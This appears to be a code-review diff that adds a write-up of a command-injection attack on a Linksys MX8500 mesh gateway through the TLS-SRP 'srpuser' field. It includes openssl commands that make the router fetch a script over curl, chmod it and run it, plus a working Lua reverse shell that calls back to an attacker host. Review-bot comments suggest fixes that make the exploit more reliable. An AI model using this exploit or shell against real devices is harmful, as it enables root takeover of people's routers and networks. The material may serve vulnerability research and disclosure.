Showing 4 changed files with 50 additions and 0 deletions.
@@ -0,0 +1,49 @@ | ||
# Linksys Mesh Network Attack | ||
## Intro | ||
In this write-up, we use Linksys MX8500, firmware version 1.0.11.208937 as an illustration example. | ||
|
||
Linksys uses TLS-SRP as its NAPS protocol. The gateway node opens TCP port 6060 for this purpose. | ||
|
||
We identify a command injection for the `srpuser` field: | ||
|
||
![](./srpuser_cmd_injection.png) | ||
|
||
Thus, the key to breaking this protocol is that an attacker can taint the `srpuser` field in a TLS-SRP connection, to contain malicious commands. | ||
|
||
## Attack Step 1: Prepare a reverse shell script | ||
|
||
I used [Reverse Shell Generator](https://www.revshells.com/) to generate a lua reverse shell for MX8500. | ||
Download my reverse shell [here](./luashell.sh), and you might want to change IP address and port number within this script to your own local machine's. | ||
|
||
## Attack Step 2: Use openssl s_client to attack the gateway node | ||
Install openssl on your own local machine. | ||
|
||
Host your lua shell prepared in Step 1 using this command: | ||
``` | ||
python3 -m http.server 4444 | ||
``` | ||
|
||
Run this command to let the gateway node (10.154.1.1) download the shell script from your local machine: | ||
|
||
``` | ||
openssl s_client -srpuser "123| curl http://10.154.1.14:4444/luashell.sh -o /tmp/luashell.sh;" -srppass pass:xxxxxx -cipher SRP -connect 10.154.1.1:6060 | ||
``` | ||
|
||
Run this command to let the gateway node chmod 777 the shell script: | ||
``` | ||
openssl s_client -srpuser "123; chmod 777 /tmp/luashell.sh;" -srppass pass:xxxxxx -cipher SRP -connect 10.154.1.1:6060 | ||
``` | ||
|
||
Run `nc` on your own local machine to listen to reverse shell connections: | ||
``` | ||
nc -l 9002 | ||
``` | ||
|
||
Finally, run this command to execute the shell script on the gateway node: | ||
``` | ||
openssl s_client -srpuser "123| /tmp/luashell.sh;" -srppass pass:xxxxxx -cipher SRP -connect 10.154.1.1:6060 | ||
``` | ||
|
||
We can see the result on the `nc` screen: | ||
![](./linksys_root.png) | ||
|
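Review bot: The write-up never says where in the gateway's TLS-SRP handling the injection lands or why it fires before the password is verified, yet the whole attack depends on that (every invocation uses a throwaway `-srppass pass:xxxxxx`); after "We identify a command injection for the `srpuser` field" add a sentence naming the process that consumes the SRP username and stating that it is passed to a shell before the SRP verifier is compared, because a reader cannot reconstruct this from the screenshot alone, and expand "NAPS" on first use. Smaller points in the same hunk: the three `openssl s_client` commands mix `|` and `;` as separators (`"123| curl ..."`, `"123; chmod 777 ..."`, `"123| /tmp/luashell.sh;"`), so pick one and say what the leading `123` token is for; `chmod 777` should be `chmod +x`, since world-writable is not needed to execute the script; and the network position should be stated explicitly, namely that the attacker host (10.154.1.14) must reach TCP 6060 on the gateway and the gateway must reach the attacker's HTTP listener on 4444 and the `nc` listener on 9002, which the 10.154.1.x addresses imply is the LAN side.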
@@ -0,0 +1 @@ | ||
/usr/bin/lua -e 'local host, port = "10.154.1.14", 9002 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' |
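Review bot: When the listener closes the connection, `tcp:receive()` returns `nil, "closed"` and the next statement, `local f = io.popen(cmd, "r")`, runs with `cmd == nil` and raises an error before `if status == "closed" then break end` is ever evaluated; move the check ahead of `io.popen` (for example `if not cmd then break end`) so the loop exits cleanly instead of crashing. Two more points: the README runs this file directly as `/tmp/luashell.sh` after `chmod`, but it has no `#!/bin/sh` line, so it only works via the invoking shell's ENOEXEC fallback, and a shebang should be added; and the script hard-codes `10.154.1.14` and port `9002` (which must match the `nc -l 9002` listener in the README) and assumes LuaSocket is present on the device (`require("socket")`), neither of which is noted anywhere, so a comment stating both assumptions would help. The return value of `tcp:connect(host, port)` is also unchecked, so a failed connect surfaces only as an error from the first `tcp:receive()`.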